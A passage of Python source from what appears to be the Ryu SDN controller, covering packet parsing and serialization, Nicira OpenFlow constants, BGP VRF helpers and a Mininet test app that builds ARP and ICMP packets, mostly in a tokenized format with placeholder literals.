        rest_data = self.data
        while cls:
            try:
                proto, cls, rest_data = cls.parser(rest_data)
            except struct.error:
                # Truncated/short buffer: keep what parsed so far.
                break
            if proto:
                self.protocols.append(proto)
        if rest_data:
            self.protocols.append(rest_data)

    def serialize(self):
        """Encode self.protocols into self.data (wire bytes).

        Serialization runs innermost-first (reversed order) because inner
        payload bytes must exist before an outer header can compute lengths/
        checksums; each protocol also receives the next-outer protocol as
        `prev` (None for the outermost).  Non-protocol entries (raw payload)
        are emitted verbatim.
        """
        self.data = bytearray()
        r = self.protocols[::-<NUM_LIT:1>]
        for i, p in enumerate(r):
            if isinstance(p, packet_base.PacketBase):
                if i == len(r) - <NUM_LIT:1>:
                    prev = None
                else:
                    prev = r[i + <NUM_LIT:1>]
                data = p.serialize(self.data, prev)
            else:
                data = six.binary_type(p)
            # Prepend: headers accumulate in front of the payload built so far.
            self.data = data + self.data

    def add_protocol(self, proto):
        """Append *proto* as the new innermost protocol/payload."""
        self.protocols.append(proto)

    def get_protocols(self, protocol):
        """Return all stacked entries that are instances of *protocol*.

        Accepts either a PacketBase subclass or an instance of one (the
        instance's class is used).
        """
        if isinstance(protocol, packet_base.PacketBase):
            protocol = protocol.__class__
        assert issubclass(protocol, packet_base.PacketBase)
        return [p for p in self.protocols if isinstance(p, protocol)]

    def get_protocol(self, protocol):
        """Return the first (outermost) match of *protocol*, or None."""
        result = self.get_protocols(protocol)
        if len(result) > <NUM_LIT:0>:
            return result[<NUM_LIT:0>]
        return None

    def __div__(self, trailer):
        # `pkt / proto` stacks proto onto this packet (Scapy-style syntax).
        self.add_protocol(trailer)
        return self

    def __truediv__(self, trailer):
        # Python 3 spelling of the same operator.
        return self.__div__(trailer)

    def __iter__(self):
        return iter(self.protocols)

    def __getitem__(self, idx):
        return self.protocols[idx]

    def __setitem__(self, idx, item):
        self.protocols[idx] = item

    def __delitem__(self, idx):
        del self.protocols[idx]

    def __len__(self):
        return len(self.protocols)

    def __contains__(self, protocol):
        # Membership by class (any instance of it stacked?) or by identity.
        if (inspect.isclass(protocol) and
                issubclass(protocol, packet_base.PacketBase)):
            return protocol in [p.__class__ for p in self.protocols]
        return protocol in self.protocols

    def __str__(self):
        return '<STR_LIT:U+002CU+0020>'.join(repr(protocol) for protocol in self.protocols)
    __repr__ = __str__


# Module-level helper installed onto PacketBase so `proto1 / proto2` starts a
# new Packet from two bare protocol instances.
def _PacketBase__div__(self, trailer):
    pkt = Packet()
    pkt.add_protocol(self)
    pkt.add_protocol(trailer)
    return pkt

packet_base.PacketBase.__div__ = _PacketBase__div__
packet_base.PacketBase.__truediv__ = _PacketBase__div__
<s> from struct import calcsize <EOL> from ryu . ofproto . ofproto_common import OFP_HEADER_SIZE <EOL> NXAST_RESUBMIT = <NUM_LIT:1> <EOL> NXAST_SET_TUNNEL = <NUM_LIT:2> <EOL> NXAST_DROP_SPOOFED_ARP__OBSOLETE = <NUM_LIT:3> <EOL> NXAST_SET_QUEUE = <NUM_LIT:4> <EOL> NXAST_POP_QUEUE = <NUM_LIT:5> <EOL> NXAST_REG_MOVE = <NUM_LIT:6> <EOL> NXAST_REG_LOAD = <NUM_LIT:7> <EOL> NXAST_NOTE = <NUM_LIT:8> <EOL> NXAST_SET_TUNNEL64 = <NUM_LIT:9> <EOL> NXAST_MULTIPATH = <NUM_LIT:10> <EOL> NXAST_AUTOPATH = <NUM_LIT:11> <EOL> NXAST_BUNDLE = <NUM_LIT:12> <EOL> NXAST_BUNDLE_LOAD = <NUM_LIT> <EOL> NXAST_RESUBMIT_TABLE = <NUM_LIT> <EOL> NXAST_OUTPUT_REG = <NUM_LIT:15> <EOL> NXAST_LEARN = <NUM_LIT:16> <EOL> NXAST_EXIT = <NUM_LIT> <EOL> NXAST_DEC_TTL = <NUM_LIT> <EOL> NXAST_FIN_TIMEOUT = <NUM_LIT> <EOL> NXAST_CONTROLLER = <NUM_LIT:20> <EOL> NXAST_CONJUNCTION = <NUM_LIT> <EOL> NXAST_CT = <NUM_LIT> <EOL> NXAST_NAT = <NUM_LIT> <EOL> NX_ACTION_RESUBMIT_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_RESUBMIT_SIZE = <NUM_LIT:16> <EOL> assert calcsize ( NX_ACTION_RESUBMIT_PACK_STR ) == NX_ACTION_RESUBMIT_SIZE <EOL> NX_ACTION_SET_TUNNEL_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_SET_TUNNEL_SIZE = <NUM_LIT:16> <EOL> assert calcsize ( NX_ACTION_SET_TUNNEL_PACK_STR ) == NX_ACTION_SET_TUNNEL_SIZE <EOL> NX_ACTION_SET_QUEUE_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_SET_QUEUE_SIZE = <NUM_LIT:16> <EOL> assert calcsize ( NX_ACTION_SET_QUEUE_PACK_STR ) == NX_ACTION_SET_QUEUE_SIZE <EOL> NX_ACTION_POP_QUEUE_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_POP_QUEUE_SIZE = <NUM_LIT:16> <EOL> assert calcsize ( NX_ACTION_POP_QUEUE_PACK_STR ) == NX_ACTION_POP_QUEUE_SIZE <EOL> NX_ACTION_REG_MOVE_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_REG_MOVE_SIZE = <NUM_LIT> <EOL> assert calcsize ( NX_ACTION_REG_MOVE_PACK_STR ) == NX_ACTION_REG_MOVE_SIZE <EOL> NX_ACTION_REG_LOAD_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_REG_LOAD_SIZE = <NUM_LIT> <EOL> assert calcsize ( NX_ACTION_REG_LOAD_PACK_STR ) == NX_ACTION_REG_LOAD_SIZE <EOL> 
NX_ACTION_SET_TUNNEL64_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_SET_TUNNEL64_SIZE = <NUM_LIT> <EOL> assert calcsize ( NX_ACTION_SET_TUNNEL64_PACK_STR ) == NX_ACTION_SET_TUNNEL64_SIZE <EOL> NX_ACTION_MULTIPATH_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_MULTIPATH_SIZE = <NUM_LIT:32> <EOL> assert calcsize ( NX_ACTION_MULTIPATH_PACK_STR ) == NX_ACTION_MULTIPATH_SIZE <EOL> NX_ACTION_NOTE_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_NOTE_SIZE = <NUM_LIT:16> <EOL> assert calcsize ( NX_ACTION_NOTE_PACK_STR ) == NX_ACTION_NOTE_SIZE <EOL> NX_ACTION_BUNDLE_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_BUNDLE_SIZE = <NUM_LIT:32> <EOL> assert calcsize ( NX_ACTION_BUNDLE_PACK_STR ) == NX_ACTION_BUNDLE_SIZE <EOL> NX_ACTION_AUTOPATH_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_AUTOPATH_SIZE = <NUM_LIT> <EOL> assert calcsize ( NX_ACTION_AUTOPATH_PACK_STR ) == NX_ACTION_AUTOPATH_SIZE <EOL> NX_ACTION_OUTPUT_REG_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_OUTPUT_REG_SIZE = <NUM_LIT> <EOL> assert calcsize ( NX_ACTION_OUTPUT_REG_PACK_STR ) == NX_ACTION_OUTPUT_REG_SIZE <EOL> NX_ACTION_LEARN_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_LEARN_SIZE = <NUM_LIT:32> <EOL> assert calcsize ( NX_ACTION_LEARN_PACK_STR ) == NX_ACTION_LEARN_SIZE <EOL> NX_ACTION_CONTROLLER_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_CONTROLLER_SIZE = <NUM_LIT:16> <EOL> assert calcsize ( NX_ACTION_CONTROLLER_PACK_STR ) == NX_ACTION_CONTROLLER_SIZE <EOL> NX_ACTION_FIN_TIMEOUT_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_FIN_TIMEOUT_SIZE = <NUM_LIT:16> <EOL> assert calcsize ( NX_ACTION_FIN_TIMEOUT_PACK_STR ) == NX_ACTION_FIN_TIMEOUT_SIZE <EOL> NX_ACTION_HEADER_PACK_STR = '<STR_LIT>' <EOL> NX_ACTION_HEADER_SIZE = <NUM_LIT:16> <EOL> assert calcsize ( NX_ACTION_HEADER_PACK_STR ) == NX_ACTION_HEADER_SIZE <EOL> NXT_ROLE_REQUEST = <NUM_LIT:10> <EOL> NXT_ROLE_REPLY = <NUM_LIT:11> <EOL> NXT_SET_FLOW_FORMAT = <NUM_LIT:12> <EOL> NXT_FLOW_MOD = <NUM_LIT> <EOL> NXT_FLOW_REMOVED = <NUM_LIT> <EOL> NXT_FLOW_MOD_TABLE_ID = <NUM_LIT:15> <EOL> NXT_SET_PACKET_IN_FORMAT = <NUM_LIT:16> 
<EOL> NXT_PACKET_IN = <NUM_LIT> <EOL> NXT_FLOW_AGE = <NUM_LIT> <EOL> NXT_SET_ASYNC_CONFIG = <NUM_LIT> <EOL> NXT_SET_CONTROLLER_ID = <NUM_LIT:20> <EOL> NX_ROLE_OTHER = <NUM_LIT:0> <EOL> NX_ROLE_MASTER = <NUM_LIT:1> <EOL> NX_ROLE_SLAVE = <NUM_LIT:2> <EOL> NXFF_OPENFLOW10 = <NUM_LIT:0> <EOL> NXFF_NXM = <NUM_LIT:2> <EOL> NXPIF_OPENFLOW10 = <NUM_LIT:0> <EOL> NXPIF_NXM = <NUM_LIT:1> <EOL> NXST_FLOW = <NUM_LIT:0> <EOL> NXST_AGGREGATE = <NUM_LIT:1> <EOL> NXST_FLOW_MONITOR = <NUM_LIT:2> <EOL> NICIRA_HEADER_PACK_STR = '<STR_LIT>' <EOL> NICIRA_HEADER_SIZE = <NUM_LIT:16> <EOL> assert ( calcsize ( NICIRA_HEADER_PACK_STR ) + <EOL> OFP_HEADER_SIZE == NICIRA_HEADER_SIZE ) <EOL> NX_ROLE_PACK_STR = '<STR_LIT>' <EOL> NX_ROLE_SIZE = <NUM_LIT:20> <EOL> assert ( calcsize ( NX_ROLE_PACK_STR ) + <EOL> NICIRA_HEADER_SIZE == NX_ROLE_SIZE ) <EOL> NX_FLOW_MOD_PACK_STR = '<STR_LIT>' <EOL> NX_FLOW_MOD_SIZE = <NUM_LIT> <EOL> assert ( calcsize ( NX_FLOW_MOD_PACK_STR ) + <EOL> NICIRA_HEADER_SIZE == NX_FLOW_MOD_SIZE ) <EOL> NX_SET_FLOW_FORMAT_PACK_STR = '<STR_LIT>' <EOL> NX_SET_FLOW_FORMAT_SIZE = <NUM_LIT:20> <EOL> assert ( calcsize ( NX_SET_FLOW_FORMAT_PACK_STR ) + <EOL> NICIRA_HEADER_SIZE == NX_SET_FLOW_FORMAT_SIZE ) <EOL> NX_FLOW_REMOVED_PACK_STR = '<STR_LIT>' <EOL> NX_FLOW_REMOVED_SIZE = <NUM_LIT> <EOL> assert ( calcsize ( NX_FLOW_REMOVED_PACK_STR ) + <EOL> NICIRA_HEADER_SIZE == NX_FLOW_REMOVED_SIZE ) <EOL> NX_FLOW_MOD_TABLE_ID_PACK_STR = '<STR_LIT>' <EOL> NX_FLOW_MOD_TABLE_ID_SIZE = <NUM_LIT> <EOL> assert ( calcsize ( NX_FLOW_MOD_TABLE_ID_PACK_STR ) + <EOL> NICIRA_HEADER_SIZE == NX_FLOW_MOD_TABLE_ID_SIZE ) <EOL> NX_SET_PACKET_IN_FORMAT_PACK_STR = '<STR_LIT>' <EOL> NX_SET_PACKET_IN_FORMAT_SIZE = <NUM_LIT:20> <EOL> assert ( calcsize ( NX_SET_PACKET_IN_FORMAT_PACK_STR ) + <EOL> NICIRA_HEADER_SIZE == NX_SET_PACKET_IN_FORMAT_SIZE ) <EOL> NX_PACKET_IN_PACK_STR = '<STR_LIT>' <EOL> NX_PACKET_IN_SIZE = <NUM_LIT> <EOL> assert ( calcsize ( NX_PACKET_IN_PACK_STR ) + <EOL> NICIRA_HEADER_SIZE == 
NX_PACKET_IN_SIZE ) <EOL> NX_ASYNC_CONFIG_PACK_STR = '<STR_LIT>' <EOL> NX_ASYNC_CONFIG_SIZE = <NUM_LIT> <EOL> assert ( calcsize ( NX_ASYNC_CONFIG_PACK_STR ) + <EOL> NICIRA_HEADER_SIZE == NX_ASYNC_CONFIG_SIZE ) <EOL> NX_CONTROLLER_ID_PACK_STR = '<STR_LIT>' <EOL> NX_CONTROLLER_ID_SIZE = <NUM_LIT> <EOL> assert ( calcsize ( NX_CONTROLLER_ID_PACK_STR ) + <EOL> NICIRA_HEADER_SIZE == NX_CONTROLLER_ID_SIZE ) <EOL> NX_STATS_MSG_PACK_STR = '<STR_LIT>' <EOL> NX_STATS_MSG0_SIZE = <NUM_LIT:8> <EOL> assert calcsize ( NX_STATS_MSG_PACK_STR ) == NX_STATS_MSG0_SIZE <EOL> NX_STATS_MSG_SIZE = <NUM_LIT> <EOL> _OFP_VENDOR_STATS_MSG_SIZE = <NUM_LIT:16> <EOL> assert ( calcsize ( NX_STATS_MSG_PACK_STR ) + _OFP_VENDOR_STATS_MSG_SIZE == <EOL> NX_STATS_MSG_SIZE ) <EOL> NX_FLOW_STATS_REQUEST_PACK_STR = '<STR_LIT>' <EOL> NX_FLOW_STATS_REQUEST_SIZE = <NUM_LIT:8> <EOL> assert ( calcsize ( NX_FLOW_STATS_REQUEST_PACK_STR ) == <EOL> NX_FLOW_STATS_REQUEST_SIZE ) <EOL> NX_FLOW_STATS_PACK_STR = '<STR_LIT>' <EOL> NX_FLOW_STATS_SIZE = <NUM_LIT> <EOL> assert calcsize ( NX_FLOW_STATS_PACK_STR ) == NX_FLOW_STATS_SIZE <EOL> NX_AGGREGATE_STATS_REQUEST_PACK_STR = '<STR_LIT>' <EOL> NX_AGGREGATE_STATS_REQUEST_SIZE = <NUM_LIT:8> <EOL> assert ( calcsize ( NX_AGGREGATE_STATS_REQUEST_PACK_STR ) == <EOL> NX_AGGREGATE_STATS_REQUEST_SIZE ) <EOL> NX_AGGREGATE_STATS_REPLY_PACK_STR = '<STR_LIT>' <EOL> NX_AGGREGATE_STATS_REPLY_SIZE = <NUM_LIT> <EOL> assert ( calcsize ( NX_AGGREGATE_STATS_REPLY_PACK_STR ) == <EOL> NX_AGGREGATE_STATS_REPLY_SIZE ) <EOL> NX_HASH_FIELDS_ETH_SRC = <NUM_LIT:0> <EOL> NX_HASH_FIELDS_SYMMETRIC_L4 = <NUM_LIT:1> <EOL> NX_MP_ALG_MODULO_N = <NUM_LIT:0> <EOL> NX_MP_ALG_HASH_THRESHOLD = <NUM_LIT:1> <EOL> NX_MP_ALG_HRW = <NUM_LIT:2> <EOL> NX_MP_ALG_ITER_HASH = <NUM_LIT:3> <EOL> NX_BD_ALG_ACTIVE_BACKUP = <NUM_LIT:0> <EOL> NX_BD_ALG_HRW = <NUM_LIT:1> <EOL> NX_LEARN_N_BITS_MASK = <NUM_LIT> <EOL> NX_LEARN_SRC_FIELD = <NUM_LIT:0> << <NUM_LIT> <EOL> NX_LEARN_SRC_IMMEDIATE = <NUM_LIT:1> << <NUM_LIT> <EOL> 
NX_LEARN_SRC_MASK = <NUM_LIT:1> << <NUM_LIT> <EOL> NX_LEARN_DST_MATCH = <NUM_LIT:0> << <NUM_LIT:11> <EOL> NX_LEARN_DST_LOAD = <NUM_LIT:1> << <NUM_LIT:11> <EOL> NX_LEARN_DST_OUTPUT = <NUM_LIT:2> << <NUM_LIT:11> <EOL> NX_LEARN_DST_RESERVED = <NUM_LIT:3> << <NUM_LIT:11> <EOL> NX_LEARN_DST_MASK = <NUM_LIT:3> << <NUM_LIT:11> <EOL> NX_NAT_RANGE_IPV4_MIN = <NUM_LIT:1> << <NUM_LIT:0> <EOL> NX_NAT_RANGE_IPV4_MAX = <NUM_LIT:1> << <NUM_LIT:1> <EOL> NX_NAT_RANGE_IPV6_MIN = <NUM_LIT:1> << <NUM_LIT:2> <EOL> NX_NAT_RANGE_IPV6_MAX = <NUM_LIT:1> << <NUM_LIT:3> <EOL> NX_NAT_RANGE_PROTO_MIN = <NUM_LIT:1> << <NUM_LIT:4> <EOL> NX_NAT_RANGE_PROTO_MAX = <NUM_LIT:1> << <NUM_LIT:5> </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from ryu . services . protocols . bgp . api . base import NEXT_HOP <EOL> from ryu . services . protocols . bgp . api . base import PREFIX <EOL> from ryu . services . protocols . bgp . api . base import RegisterWithArgChecks <EOL> from ryu . services . protocols . bgp . api . base import ROUTE_DISTINGUISHER <EOL> from ryu . services . protocols . bgp . api . base import VPN_LABEL <EOL> from ryu . services . protocols . bgp . base import add_bgp_error_metadata <EOL> from ryu . services . protocols . bgp . base import PREFIX_ERROR_CODE <EOL> from ryu . services . protocols . bgp . base import validate <EOL> from ryu . services . protocols . bgp . core import BgpCoreError <EOL> from ryu . services . protocols . bgp . core_manager import CORE_MANAGER <EOL> from ryu . services . protocols . bgp . rtconf . base import RuntimeConfigError <EOL> from ryu . services . protocols . bgp . rtconf . vrfs import VRF_RF <EOL> from ryu . services . protocols . bgp . rtconf . vrfs import VRF_RF_IPV4 <EOL> from ryu . services . protocols . bgp . utils import validation <EOL> LOG = logging . getLogger ( '<STR_LIT>' ) <EOL> @ add_bgp_error_metadata ( code = PREFIX_ERROR_CODE , <EOL> sub_code = <NUM_LIT:1> , <EOL> def_desc = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> class PrefixError ( RuntimeConfigError ) : <EOL> pass <EOL> @ validate ( name = PREFIX ) <EOL> def is_valid_prefix ( ipv4_prefix ) : <EOL> return validation . is_valid_ipv4_prefix ( ipv4_prefix ) <EOL> @ validate ( name = NEXT_HOP ) <EOL> def is_valid_next_hop ( next_hop_addr ) : <EOL> return validation . is_valid_ipv4 ( next_hop_addr ) <EOL> @ RegisterWithArgChecks ( name = '<STR_LIT>' , <EOL> req_args = [ ROUTE_DISTINGUISHER , PREFIX , NEXT_HOP ] , <EOL> opt_args = [ VRF_RF ] ) <EOL> def add_local ( route_dist , prefix , next_hop , route_family = VRF_RF_IPV4 ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> tm = CORE_MANAGER . get_core_service ( ) . table_manager <EOL> label = tm . 
add_to_vrf ( route_dist , prefix , next_hop , route_family ) <EOL> if label : <EOL> label = label [ <NUM_LIT:0> ] <EOL> return [ { ROUTE_DISTINGUISHER : route_dist , PREFIX : prefix , <EOL> VRF_RF : route_family , VPN_LABEL : label } ] <EOL> except BgpCoreError as e : <EOL> raise PrefixError ( desc = e ) <EOL> @ RegisterWithArgChecks ( name = '<STR_LIT>' , <EOL> req_args = [ ROUTE_DISTINGUISHER , PREFIX ] , <EOL> opt_args = [ VRF_RF ] ) <EOL> def delete_local ( route_dist , prefix , route_family = VRF_RF_IPV4 ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> tm = CORE_MANAGER . get_core_service ( ) . table_manager <EOL> tm . remove_from_vrf ( route_dist , prefix , route_family ) <EOL> return [ { ROUTE_DISTINGUISHER : route_dist , PREFIX : prefix , <EOL> VRF_RF : route_family } ] <EOL> except BgpCoreError as e : <EOL> raise PrefixError ( desc = e ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from ryu . lib . packet . bgp import IP6AddrPrefix <EOL> from ryu . lib . packet . bgp import RF_IPv6_VPN <EOL> from ryu . services . protocols . bgp . info_base . vpn import VpnDest <EOL> from ryu . services . protocols . bgp . info_base . vpn import VpnPath <EOL> from ryu . services . protocols . bgp . info_base . vpn import VpnTable <EOL> LOG = logging . getLogger ( '<STR_LIT>' ) <EOL> class Vpnv6Dest ( VpnDest ) : <EOL> """<STR_LIT>""" <EOL> ROUTE_FAMILY = RF_IPv6_VPN <EOL> class Vpnv6Table ( VpnTable ) : <EOL> """<STR_LIT>""" <EOL> ROUTE_FAMILY = RF_IPv6_VPN <EOL> VPN_DEST_CLASS = Vpnv6Dest <EOL> class Vpnv6Path ( VpnPath ) : <EOL> """<STR_LIT>""" <EOL> ROUTE_FAMILY = RF_IPv6_VPN <EOL> VRF_PATH_CLASS = None <EOL> NLRI_CLASS = IP6AddrPrefix <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( Vpnv6Path , self ) . __init__ ( * args , ** kwargs ) <EOL> from ryu . services . protocols . bgp . info_base . vrf6 import Vrf6Path <EOL> self . VRF_PATH_CLASS = Vrf6Path </s>
<s> import importlib <EOL> import inspect <EOL> import six <EOL> class Field ( object ) : <EOL> def __init__ ( self , field_name ) : <EOL> self . field_name = field_name <EOL> def get ( self , obj ) : <EOL> return getattr ( obj , self . field_name ) <EOL> class RelatedViewField ( Field ) : <EOL> def __init__ ( self , field_name , operator_view_class ) : <EOL> super ( RelatedViewField , self ) . __init__ ( field_name ) <EOL> self . __operator_view_class = operator_view_class <EOL> @ property <EOL> def _operator_view_class ( self ) : <EOL> if inspect . isclass ( self . __operator_view_class ) : <EOL> return self . __operator_view_class <EOL> elif isinstance ( self . __operator_view_class , six . string_types ) : <EOL> try : <EOL> module_name , class_name = self . __operator_view_class . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> return class_for_name ( module_name , class_name ) <EOL> except ( AttributeError , ValueError , ImportError ) : <EOL> raise WrongOperatorViewClassError ( <EOL> '<STR_LIT>' % self . __operator_view_class <EOL> ) <EOL> def retrieve_and_wrap ( self , obj ) : <EOL> related_obj = self . get ( obj ) <EOL> return self . wrap ( related_obj ) <EOL> def wrap ( self , obj ) : <EOL> return self . _operator_view_class ( obj ) <EOL> class RelatedListViewField ( RelatedViewField ) : <EOL> pass <EOL> class RelatedDictViewField ( RelatedViewField ) : <EOL> pass <EOL> class DataField ( Field ) : <EOL> pass <EOL> class OptionalDataField ( DataField ) : <EOL> def get ( self , obj ) : <EOL> if hasattr ( obj , self . field_name ) : <EOL> return getattr ( obj , self . field_name ) <EOL> else : <EOL> return None <EOL> class WrongOperatorViewClassError ( Exception ) : <EOL> pass <EOL> def class_for_name ( module_name , class_name ) : <EOL> m = importlib . import_module ( module_name ) <EOL> c = getattr ( m , class_name ) <EOL> return c </s>
<s> import uuid <EOL> class _UUIDDict ( dict ) : <EOL> def _uuidize ( self ) : <EOL> if '<STR_LIT>' not in self or self [ '<STR_LIT>' ] is None : <EOL> self [ '<STR_LIT>' ] = uuid . uuid4 ( ) <EOL> @ property <EOL> def uuid ( self ) : <EOL> self . _uuidize ( ) <EOL> return self [ '<STR_LIT>' ] <EOL> @ uuid . setter <EOL> def uuid ( self , value ) : <EOL> self [ '<STR_LIT>' ] = value <EOL> class Row ( _UUIDDict ) : <EOL> @ property <EOL> def delete ( self ) : <EOL> if '<STR_LIT>' in self and self [ '<STR_LIT>' ] : <EOL> return True <EOL> return False <EOL> @ delete . setter <EOL> def delete ( self , value ) : <EOL> self [ '<STR_LIT>' ] = value </s>
<s> import logging <EOL> import array <EOL> import netaddr <EOL> from ryu . base import app_manager <EOL> from ryu . controller import dpset <EOL> from ryu . controller import ofp_event <EOL> from ryu . controller import handler <EOL> from ryu . ofproto import ofproto_v1_2 <EOL> from ryu . ofproto import ether <EOL> from ryu . ofproto import inet <EOL> from ryu . lib import mac <EOL> from ryu . lib . packet import packet <EOL> from ryu . lib . packet import ethernet <EOL> from ryu . lib . packet import arp <EOL> from ryu . lib . packet import ipv4 <EOL> from ryu . lib . packet import icmp <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class RunTestMininet ( app_manager . RyuApp ) : <EOL> _CONTEXTS = { '<STR_LIT>' : dpset . DPSet } <EOL> OFP_VERSIONS = [ ofproto_v1_2 . OFP_VERSION ] <EOL> ZERO_MAC = mac . haddr_to_bin ( '<STR_LIT>' ) <EOL> BROADCAST_MAC = mac . haddr_to_bin ( '<STR_LIT>' ) <EOL> RYU_MAC = mac . haddr_to_bin ( '<STR_LIT>' ) <EOL> HOST_MAC = mac . haddr_to_bin ( '<STR_LIT>' ) <EOL> RYU_IP = int ( netaddr . IPAddress ( '<STR_LIT>' ) ) <EOL> HOST_IP = int ( netaddr . IPAddress ( '<STR_LIT>' ) ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( RunTestMininet , self ) . __init__ ( * args , ** kwargs ) <EOL> def _send_msg ( self , dp , data ) : <EOL> buffer_id = <NUM_LIT> <EOL> in_port = dp . ofproto . OFPP_LOCAL <EOL> actions = [ dp . ofproto_parser . OFPActionOutput ( <NUM_LIT:1> , <NUM_LIT:0> ) ] <EOL> msg = dp . ofproto_parser . OFPPacketOut ( <EOL> dp , buffer_id , in_port , actions , data ) <EOL> dp . send_msg ( msg ) <EOL> def _add_flow ( self , dp , match , actions ) : <EOL> inst = [ dp . ofproto_parser . OFPInstructionActions ( <EOL> dp . ofproto . OFPIT_APPLY_ACTIONS , actions ) ] <EOL> mod = dp . ofproto_parser . OFPFlowMod ( <EOL> dp , cookie = <NUM_LIT:0> , cookie_mask = <NUM_LIT:0> , table_id = <NUM_LIT:0> , <EOL> command = dp . ofproto . 
OFPFC_ADD , idle_timeout = <NUM_LIT:0> , hard_timeout = <NUM_LIT:0> , <EOL> priority = <NUM_LIT> , buffer_id = <NUM_LIT> , <EOL> out_port = dp . ofproto . OFPP_ANY , out_group = dp . ofproto . OFPG_ANY , <EOL> flags = <NUM_LIT:0> , match = match , instructions = inst ) <EOL> dp . send_msg ( mod ) <EOL> def _find_protocol ( self , pkt , name ) : <EOL> for p in pkt . protocols : <EOL> if hasattr ( p , '<STR_LIT>' ) : <EOL> if p . protocol_name == name : <EOL> return p <EOL> def _get_protocols ( self , pkt ) : <EOL> protocols = { } <EOL> for p in pkt : <EOL> if hasattr ( p , '<STR_LIT>' ) : <EOL> protocols [ p . protocol_name ] = p <EOL> else : <EOL> protocols [ '<STR_LIT>' ] = p <EOL> return protocols <EOL> def _build_ether ( self , ethertype , dst_mac = HOST_MAC ) : <EOL> e = ethernet . ethernet ( dst_mac , self . RYU_MAC , ethertype ) <EOL> return e <EOL> def _build_arp ( self , opcode , dst_ip = HOST_IP ) : <EOL> if opcode == arp . ARP_REQUEST : <EOL> _eth_dst_mac = self . BROADCAST_MAC <EOL> _arp_dst_mac = self . ZERO_MAC <EOL> elif opcode == arp . ARP_REPLY : <EOL> _eth_dst_mac = self . HOST_MAC <EOL> _arp_dst_mac = self . HOST_MAC <EOL> e = self . _build_ether ( ether . ETH_TYPE_ARP , _eth_dst_mac ) <EOL> a = arp . arp ( hwtype = <NUM_LIT:1> , proto = ether . ETH_TYPE_IP , hlen = <NUM_LIT:6> , plen = <NUM_LIT:4> , <EOL> opcode = opcode , src_mac = self . RYU_MAC , src_ip = self . RYU_IP , <EOL> dst_mac = _arp_dst_mac , dst_ip = dst_ip ) <EOL> p = packet . Packet ( ) <EOL> p . add_protocol ( e ) <EOL> p . add_protocol ( a ) <EOL> p . serialize ( ) <EOL> return p <EOL> def _build_echo ( self , _type , echo ) : <EOL> e = self . _build_ether ( ether . ETH_TYPE_IP ) <EOL> ip = ipv4 . ipv4 ( version = <NUM_LIT:4> , header_length = <NUM_LIT:5> , tos = <NUM_LIT:0> , total_length = <NUM_LIT> , <EOL> identification = <NUM_LIT:0> , flags = <NUM_LIT:0> , offset = <NUM_LIT:0> , ttl = <NUM_LIT:64> , <EOL> proto = inet . IPPROTO_ICMP , csum = <NUM_LIT:0> , <EOL> src = self . 
RYU_IP , dst = self . HOST_IP ) <EOL> ping = icmp . icmp ( _type , code = <NUM_LIT:0> , csum = <NUM_LIT:0> , data = echo ) <EOL> p = packet . Packet ( ) <EOL> p . add_protocol ( e ) <EOL> p . add_protocol ( ip ) <EOL> p . add_protocol ( ping ) <EOL> p . serialize ( ) <EOL> return p <EOL> def _garp ( self ) : <EOL> p = self . _build_arp ( arp . ARP_REQUEST , self . RYU_IP ) <EOL> return p . data <EOL> def _arp_request ( self ) : <EOL> p = self . _build_arp ( arp . ARP_REQUEST , self . HOST_IP ) <EOL> return p . data <EOL> def _arp_reply ( self ) : <EOL> p = self . _build_arp ( arp . ARP_REPLY , self . HOST_IP ) <EOL> return p . data <EOL> def _echo_request ( self , echo ) : <EOL> p = self . _build_echo ( icmp . ICMP_ECHO_REQUEST , echo ) <EOL> return p . data <EOL> def _echo_reply ( self , echo ) : <EOL> p = self . _build_echo ( icmp . ICMP_ECHO_REPLY , echo ) <EOL> return p . data <EOL> @ handler . set_ev_cls ( ofp_event . EventOFPPacketIn , handler . MAIN_DISPATCHER ) <EOL> def packet_in_handler ( self , ev ) : <EOL> msg = ev . msg <EOL> dp = msg . datapath <EOL> pkt = packet . Packet ( array . array ( '<STR_LIT:B>' , msg . data ) ) <EOL> p_arp = self . _find_protocol ( pkt , "<STR_LIT>" ) <EOL> p_icmp = self . _find_protocol ( pkt , "<STR_LIT>" ) <EOL> p_ipv4 = self . _find_protocol ( pkt , "<STR_LIT>" ) <EOL> if p_arp : <EOL> src_ip = str ( netaddr . IPAddress ( p_arp . src_ip ) ) <EOL> dst_ip = str ( netaddr . IPAddress ( p_arp . dst_ip ) ) <EOL> if p_arp . opcode == arp . ARP_REQUEST : <EOL> LOG . debug ( "<STR_LIT>" , src_ip , dst_ip ) <EOL> if p_arp . dst_ip == self . RYU_IP : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> data = self . _arp_reply ( ) <EOL> self . _send_msg ( dp , data ) <EOL> elif p_arp . dst_ip == self . HOST_IP : <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> LOG . debug ( "<STR_LIT>" ) <EOL> data = self . _arp_request ( ) <EOL> self . _send_msg ( dp , data ) <EOL> elif p_arp . opcode == arp . ARP_REPLY : <EOL> LOG . 
